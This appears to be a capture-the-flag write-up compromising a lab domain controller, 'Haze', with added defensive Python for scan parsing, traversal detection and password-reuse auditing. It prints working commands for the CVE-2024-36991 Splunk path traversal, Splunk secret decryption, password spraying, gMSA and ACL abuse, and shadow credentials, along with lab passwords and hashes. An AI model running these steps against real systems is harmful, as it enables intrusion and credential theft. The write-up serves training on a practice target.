Basic information

Port scan

Splunk-related ports plus the usual domain-controller ports:

$ nmap -sC -sV -Pn 10.10.11.61
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-31 12:18 CST
Nmap scan report for 10.10.11.61
Host is up (0.070s latency).
Not shown: 985 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-31 12:00:08Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after: 2026-03-05T07:12:20
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after: 2026-03-05T07:12:20
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after: 2026-03-05T07:12:20
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after: 2026-03-05T07:12:20
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8000/tcp open http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.10.11.61:8000/en-US/account/login?return_to=%2Fen-US%2F
8088/tcp open ssl/http Splunkd httpd
|_http-server-header: Splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after: 2028-03-04T07:29:08
|_http-title: 404 Not Found
| http-robots.txt: 1 disallowed entry
|_/
8089/tcp open ssl/http Splunkd httpd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after: 2028-03-04T07:29:08
|_http-server-header: Splunkd
|_http-title: splunkd
| http-robots.txt: 1 disallowed entry
|_/
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 7h41m12s
| smb2-time:
| date: 2025-03-31T12:00:51
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.80 seconds
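The scan above is easier to act on as structured data than as a wall of text. The Python below is an added example, not part of the writeup: it parses nmap's normal-output port lines, picks out the splunkd ports from their banners, checks the open ports against a hypothetical exposure policy (the `RESTRICTED_PORTS` list is my own, not from the page), and converts the `clock-skew` line into seconds. That last point matters later: a skew of 7h41m is far beyond the 5-minute tolerance Kerberos allows by default, which is why the PKINIT step further down has to run under `faketime`.

```python
import re

# Constructed excerpt of the nmap output above: only the port lines and the
# clock-skew line matter to this parser.
SCAN_OUTPUT = """\
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-31 12:00:08Z)
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8000/tcp open http Splunkd httpd
8088/tcp open ssl/http Splunkd httpd
8089/tcp open ssl/http Splunkd httpd
|_clock-skew: 7h41m12s
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
SKEW_LINE = re.compile(r"clock-skew:\s*(-?)(?:(\d+)h)?(?:(\d+)m)?(?:(\d+)s)?")

# Hypothetical exposure policy (my own, not from the writeup): services that should
# only be reachable from management networks, with the reason a reviewer would cite.
RESTRICTED_PORTS = {
    445: "SMB: password-spraying and lateral-movement surface",
    5985: "WinRM: remote shell for any account allowed to log on remotely",
    8000: "Splunk Web: login UI, and the path the traversal below is reached through",
    8088: "Splunk HEC: event-ingestion endpoint",
    8089: "splunkd management port: REST API with full administrative reach",
}


def parse_scan(text):
    """Return (port, proto, service, version) tuples for every open port in the scan."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m and m.group(3) == "open":
            ports.append((int(m.group(1)), m.group(2), m.group(4), m.group(5).strip()))
    return ports


def splunk_ports(ports):
    """Ports whose version banner identifies splunkd, sorted ascending."""
    return sorted(p for p, _, _, ver in ports if "Splunkd" in ver)


def exposure_findings(ports):
    """Map each open restricted port to the policy reason it was flagged."""
    return {p: RESTRICTED_PORTS[p] for p, _, _, _ in ports if p in RESTRICTED_PORTS}


def clock_skew_seconds(text):
    """Parse nmap's clock-skew value ('7h41m12s' above) into signed seconds; None if absent."""
    m = SKEW_LINE.search(text)
    if not m:
        return None
    sign, h, mnt, s = m.groups()
    total = sum(int(x) * unit if x else 0 for x, unit in ((h, 3600), (mnt, 60), (s, 1)))
    return -total if sign else total


def kerberos_skew_ok(text, tolerance=300):
    """Kerberos rejects authentication when client and DC clocks differ by more than
    the tolerance (5 minutes by default); a 7h41m skew will fail every request."""
    skew = clock_skew_seconds(text)
    return skew is not None and abs(skew) <= tolerance


if __name__ == "__main__":
    open_ports = parse_scan(SCAN_OUTPUT)
    for port, reason in sorted(exposure_findings(open_ports).items()):
        print(f"{port}: {reason}")
    print("clock skew (s):", clock_skew_seconds(SCAN_OUTPUT),
          "kerberos ok:", kerberos_skew_ok(SCAN_OUTPUT))
```

The parser only looks at lines nmap prints in its normal output format; feed it `-oN` output or a pasted terminal session, not XML.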

Splunk

Port 8000 is Splunk Web:

CVE-2024-36991

A routine scan plus a search for Splunk vulnerabilities turns up the following:

nuclei -target http://10.10.11.61:8000/

[CVE-2024-36991] [http] [high] http://10.10.11.61:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Windows/win.ini

Running the PoC script for it returns some hashes:

python3 CVE-2024-36991.py -u http://10.10.11.61:8000/

:admin:$6$Ak3m7.aHgb/NOQez$O7C8Ck2lg5RaXJs9FrwPr7xbJBJxMCpqIx3TG30Pvl7JSvv0pn3vtYnt8qF4WhL7hBZygwemqn7PBj5dLBm0D1::Administrator:admin:changeme@example.com:::20152
:edward:$6$3LQHFzfmlpMgxY57$Sk32K6eknpAtcT23h6igJRuM1eCe7WAfygm103cQ22/Niwp1pTCKzc0Ok1qhV25UsoUN4t7HYfoGDb4ZCv8pw1::Edward@haze.htb:user:Edward@haze.htb:::20152
:mark:$6$j4QsAJiV8mLg/bhA$Oa/l2cgCXF8Ux7xIaDe3dMW6.Qfobo0PtztrVMHZgdGa1j8423jUvMqYuqjZa/LPd.xryUwe699/8SgNC6v2H/:::user:Mark@haze.htb:::20152
:paul:$6$Y5ds8NjDLd7SzOTW$Zg/WOJxk38KtI.ci9RFl87hhWSawfpT6X.woxTvB4rduL4rDKkE.psK7eXm6TgriABAhqdCPI4P0hcB8xz0cd1:::user:paul@haze.htb:::20152
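From the defender's side, the question after a finding like the one above is whether the traversal was actually used against the instance and which files were read, since a successful read of `splunk.secret` or `authentication.conf` means the secret and the LDAP bind password have to be rotated. The Python below is an added example, not from the writeup or the PoC: it percent-decodes request paths repeatedly, counts `..` segments including the drive-prefixed `C:..` form used against Splunk on Windows, and rates a confirmed read of a credential file above a mere probe. The log lines are constructed in common log format; their paths are modelled on the nuclei and curl requests in this writeup, and the last two probes are made up.

```python
import re
from urllib.parse import unquote

# Constructed access-log sample (common log format). Line 2 reproduces the nuclei
# request; lines 3 and 4 the curl requests used later in the writeup, percent-encoded
# as a client might send them; lines 5 and 6 are made-up noise for the example.
TRAVERSAL = "C:../" * 11
SAMPLE_LOG = (
    '10.10.14.5 - - [31/Mar/2025:12:20:01 +0000] "GET /en-US/account/login?return_to=%2Fen-US%2F HTTP/1.1" 200 5120\n'
    f'10.10.14.5 - - [31/Mar/2025:12:21:07 +0000] "GET /en-US/modules/messaging/{TRAVERSAL}Windows/win.ini HTTP/1.1" 200 403\n'
    '10.10.14.5 - - [31/Mar/2025:12:22:15 +0000] "GET /en-US/modules/messaging/C%3A..%2FC%3A..%2FC%3A..%2FProgram%20Files/Splunk/etc/auth/splunk.secret HTTP/1.1" 200 254\n'
    '10.10.14.5 - - [31/Mar/2025:12:22:40 +0000] "GET /en-US/modules/messaging/..%2F..%2F..%2F..%2Fetc/system/local/authentication.conf HTTP/1.1" 200 312\n'
    '10.10.14.9 - - [31/Mar/2025:12:25:00 +0000] "GET /en-US/modules/messaging/../../Windows/system.ini HTTP/1.1" 404 0\n'
    '10.10.14.9 - - [31/Mar/2025:12:25:30 +0000] "GET /en-US/static/js/build/pages/enterprise/login.js HTTP/1.1" 200 99001\n'
)

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)')
# A path segment that is exactly '..', or '..' behind a drive letter (the 'C:..' form
# that works against Splunk on Windows), is one traversal step.
DOTDOT_SEGMENT = re.compile(r"^(?:[A-Za-z]:)?\.\.$")
# Files whose retrieval means credentials left the host, not merely that it was probed.
HIGH_VALUE_FILES = ("splunk.secret", "authentication.conf", "passwd")


def decode_fully(path, rounds=3):
    """Undo repeated percent-encoding so %2F / %3A / %252e cannot hide a traversal step."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def traversal_depth(raw_path):
    """Number of traversal segments in a request path (query string ignored)."""
    path = decode_fully(raw_path.split("?", 1)[0])
    return sum(1 for seg in path.split("/") if DOTDOT_SEGMENT.match(seg))


def scan_log(text):
    """One finding per request that steps out of its directory, with a severity that
    separates a successful read of a credential file from an ordinary probe."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        src, ts, _method, raw_path, status, _size = m.groups()
        depth = traversal_depth(raw_path)
        if depth == 0:
            continue
        decoded = decode_fully(raw_path.split("?", 1)[0])
        target = decoded.rsplit("/", 1)[-1]
        succeeded = status == "200"
        if succeeded and target in HIGH_VALUE_FILES:
            severity = "critical"   # secret or bind password exposed: rotate both
        elif succeeded:
            severity = "high"       # arbitrary file read confirmed
        else:
            severity = "medium"     # attempt blocked or file absent
        findings.append({"src": src, "timestamp": ts, "target": target,
                         "depth": depth, "status": int(status), "severity": severity})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['severity']:8} {f['src']:12} depth={f['depth']:2} {f['status']} {f['target']}")
```

Adjust `REQUEST_RE` to the layout of whatever access log you have; the detection in `traversal_depth` does not depend on it. Patching is the fix for the vulnerability itself; this check is for establishing, after the fact, whether it was exploited and which secrets need rotating.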

splunksecrets

The hashes obtained cannot be cracked, but a search turns up a tool:

This tool uses splunk.secret to decrypt the encrypted passwords stored in the configuration files:

curl -s "http://10.10.11.61:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Program%20Files/Splunk//etc/auth/splunk.secret"

NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD

curl -s "http://10.10.11.61:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Program%20Files/Splunk//etc/system/local/authentication.conf"
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=

Decrypting it yields a password:

pip3 install splunksecrets

$ splunksecrets splunk-decrypt -S secret
Ciphertext: $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
Ld@p_Auth_Sp1unk@2k24

Paul Taylor

Using the username and password from the configuration file, and trying variants of the username, the account format is confirmed to be paul.taylor:

nxc smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24'

users

Enumerate usernames:

nxc smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute 10000 | grep SidTypeUser | cut -d ':' -f2 | cut -d '\' -f2 | cut -d ' ' -f1 > users.txt

Administrator
Guest
krbtgt
DC01$
paul.taylor
mark.adams
edward.martin
alexander.green
Haze-IT-Backup$
serio$

mark.adams

Password spraying shows that mark.adams uses the same password:

nxc smb haze.htb -u users.txt -p 'Ld@p_Auth_Sp1unk@2k24' --continue-on-success

SMB 10.10.11.61 445 DC01 [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
SMB 10.10.11.61 445 DC01 [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24

bloodhound

Routine BloodHound collection:

bloodhound-python  -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -ns 10.10.11.61 -c All --zip

mark.adams to Haze-IT-Backup

mark.adams is a member of gMSA_Managers. The usual gMSA check returns an empty result:

nxc ldap haze.htb -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa

LDAPS 10.10.11.61 636 DC01 Account: Haze-IT-Backup$ NTLM:

But it does show that the gMSA account is Haze-IT-Backup$, so manually set mark.adams as a principal allowed to retrieve the managed password and run the check again; this time the gMSA hash is returned:

# Work quickly: there is an automatic cleanup that reverts this
Set-ADServiceAccount -Identity "Haze-IT-Backup" -PrincipalsAllowedToRetrieveManagedPassword "mark.adams"
$user = Get-ADUser -Identity "mark.adams"
Set-ADServiceAccount -Identity "Haze-IT-Backup" -PrincipalsAllowedToRetrieveManagedPassword $user.DistinguishedName

nxc ldap haze.htb -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa

LDAPS 10.10.11.61 636 DC01 Account: Haze-IT-Backup$ NTLM: 735c02c6b2dc54c3c8c6891f55279ebc

Haze-IT-Backup to edward.martin

Haze-IT-Backup has WriteOwner over SUPPORT_SERVICES:

WriteOwner & AddMember

Set itself as the owner, then modify the permissions and add members to the group:

bloodyAD --host 10.10.11.61 -d haze.htb -u 'Haze-IT-Backup$' -p ':735C02C6B2DC54C3C8C6891F55279EBC' set owner 'SUPPORT_SERVICES' 'Haze-IT-Backup$'
bloodyAD --host 10.10.11.61 -d haze.htb -u "Haze-IT-Backup$" -p ":735C02C6B2DC54C3C8C6891F55279EBC" add genericAll "SUPPORT_SERVICES" "Haze-IT-Backup$"
bloodyAD --host 10.10.11.61 -d haze.htb -u "Haze-IT-Backup$" -p ":735C02C6B2DC54C3C8C6891F55279EBC" add groupMember 'SUPPORT_SERVICES' 'mark.adams'
bloodyAD --host 10.10.11.61 -d haze.htb -u "Haze-IT-Backup$" -p ":735C02C6B2DC54C3C8C6891F55279EBC" add groupMember 'SUPPORT_SERVICES' 'edward.martin'

edward.martin

Running BloodHound again shows AddKeyCredentialLink over edward.martin:

bloodhound-python -u 'Haze-IT-Backup$' --hashes 'aad3b435b51404eeaad3b435b51404ee:735c02c6b2dc54c3c8c6891f55279ebc' -d 'haze.htb' -ns 10.10.11.61 --zip -c All -dc 'dc01.haze.htb'

So this is the standard shadow credentials technique:

bloodyAD --host 10.10.11.61 -d haze.htb -u "Haze-IT-Backup$" -p ":735C02C6B2DC54C3C8C6891F55279EBC" add groupMember 'SUPPORT_SERVICES' 'Haze-IT-Backup$'

python3 pywhisker.py -d haze.htb -u 'Haze-IT-Backup$' -H '735c02c6b2dc54c3c8c6891f55279ebc' --target 'edward.martin' --action "add"

faketime "$(curl -sik http://10.10.11.61:8000 | grep -i 'Date: ' | sed s/'Date: '//g)" bash

python3 PKINITtools/gettgtpkinit.py -cert-pfx 'xf33OrUn.pfx' -pfx-pass 38FV5F9iB5saBqUXUIVS 'HAZE.HTB/edward.martin' edward.martin.ccache

export KRB5CCNAME=edward.martin.ccache
python3 PKINITtools/getnthash.py -key 7aafb6f546c02459e6b0ca9730323aceb099fb685a1ac07775116aa83248c450 'HAZE.HTB/edward.martin'

Recovered NT Hash
09e0b3eeb2e7a6b0d419e9ff8f4d91af

user flag

Log in with the edward.martin hash obtained:

evil-winrm -i haze.htb -u 'edward.martin' -H '09e0b3eeb2e7a6b0d419e9ff8f4d91af'

Backups

edward.martin is a member of Backup_Reviewers and can read the files under Backups in the root of the drive:

*Evil-WinRM* PS C:\Backups\Splunk> download splunk_backup_2024-08-06.zip

splunk

After that it is the same approach as before: take the secret and the encrypted password from the files and decrypt:

var/run/splunk/confsnapshot/baseline_local/system/local/authentication.conf

bindDN = CN=alexander.green,CN=Users,DC=haze,DC=htb
bindDNpassword = $1$YDz8WfhoCWmf6aTRkA+QqUI=

etc/auth/splunk.secret

CgL8i4HvEen3cCYOYZDBkuATi5WQuORBw9g4zp4pv5mpMcMF3sWKtaCWTX8Kc1BK3pb9HR13oJqHpvYLUZ.gIJIuYZCA/YNwbbI4fDkbpGD.8yX/8VPVTG22V5G5rDxO5qNzXSQIz3NBtFE6oPhVLAVOJ0EgCYGjuk.fgspXYUc9F24Q6P/QGB/XP8sLZ2h00FQYRmxaSUTAroHHz8fYIsChsea7GBRaolimfQLD7yWGefscTbuXOMJOrzr/6B

$ splunksecrets splunk-decrypt -S secret2
Ciphertext: $1$YDz8WfhoCWmf6aTRkA+QqUI=
Sp1unkadmin@2k24

Splunk to alexander.green

The password obtained logs in to Splunk Web:

admin
Sp1unkadmin@2k24

Then install a malicious app to get a shell as alexander.green:

Privilege escalation & root flag

alexander.green has SeImpersonatePrivilege; load a meterpreter and getsystem does it in one step:

hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:06dc954d32cb91ac2831d67e3e12027f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:937e28202a6cdfcc556d1b677bcbe82c:::
paul.taylor:1103:aad3b435b51404eeaad3b435b51404ee:e90878e2fb0a21a11859ff60f1119fb4:::
mark.adams:1104:aad3b435b51404eeaad3b435b51404ee:e90878e2fb0a21a11859ff60f1119fb4:::
edward.martin:1105:aad3b435b51404eeaad3b435b51404ee:09e0b3eeb2e7a6b0d419e9ff8f4d91af:::
alexander.green:1106:aad3b435b51404eeaad3b435b51404ee:6b8caa0cd4f8cb8ddf2b5677a24cc510:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:9dcbc33adec3bdc8b2334060002ce1b4:::
Haze-IT-Backup$:1111:aad3b435b51404eeaad3b435b51404ee:735c02c6b2dc54c3c8c6891f55279ebc:::
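The password-spray result earlier (paul.taylor and mark.adams accept the same password) and the hashdump above show the same weakness from two sides: two accounts with an identical NT hash. That is something a domain owner can audit without any spraying. The Python below is an added example, not part of the writeup: it reads a pwdump-format export and reports shared NT hashes, empty passwords and accounts still storing an LM hash. The sample reuses hash values from the dump above; the `legacy.svc` line and its LM value are constructed for the example.

```python
from collections import defaultdict

# Sentinel values: LM of an account with no LM hash stored, NT of the empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed pwdump-format sample (user:RID:LM:NT:::). The first four lines reuse
# values from the hashdump above; 'legacy.svc' and its LM hash are made up.
SAMPLE_DUMP = """\
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
paul.taylor:1103:aad3b435b51404eeaad3b435b51404ee:e90878e2fb0a21a11859ff60f1119fb4:::
mark.adams:1104:aad3b435b51404eeaad3b435b51404ee:e90878e2fb0a21a11859ff60f1119fb4:::
edward.martin:1105:aad3b435b51404eeaad3b435b51404ee:09e0b3eeb2e7a6b0d419e9ff8f4d91af:::
legacy.svc:1200:0123456789abcdef0123456789abcdef:e90878e2fb0a21a11859ff60f1119fb4:::
"""


def parse_dump(text):
    """Parse pwdump lines into dicts; malformed lines are skipped rather than guessed at."""
    accounts = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        accounts.append({"user": parts[0], "rid": int(parts[1]),
                         "lm": parts[2].lower(), "nt": parts[3].lower()})
    return accounts


def shared_passwords(accounts):
    """NT hashes used by more than one account: the reuse that let a single leaked
    Splunk bind password log in as a second domain user in this writeup."""
    by_hash = defaultdict(list)
    for a in accounts:
        by_hash[a["nt"]].append(a["user"])
    return {h: sorted(users) for h, users in by_hash.items() if len(users) > 1}


def empty_password_accounts(accounts):
    """Accounts whose NT hash is that of the empty string."""
    return [a["user"] for a in accounts if a["nt"] == EMPTY_NT]


def lm_hash_accounts(accounts):
    """Accounts still carrying a real LM hash (trivially crackable; NoLMHash should be on)."""
    return [a["user"] for a in accounts if a["lm"] != EMPTY_LM]


def report(text):
    """Summarise the three findings for a dump."""
    accounts = parse_dump(text)
    return {"accounts": len(accounts),
            "shared": shared_passwords(accounts),
            "empty": empty_password_accounts(accounts),
            "lm": lm_hash_accounts(accounts)}


if __name__ == "__main__":
    for key, value in report(SAMPLE_DUMP).items():
        print(f"{key}: {value}")
```

The same check is what DSInternals' Test-PasswordQuality performs against a live DC or an ntds.dit; the point of writing it out is to see that password reuse is visible to the domain owner from the hashes alone, before anyone sprays.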

References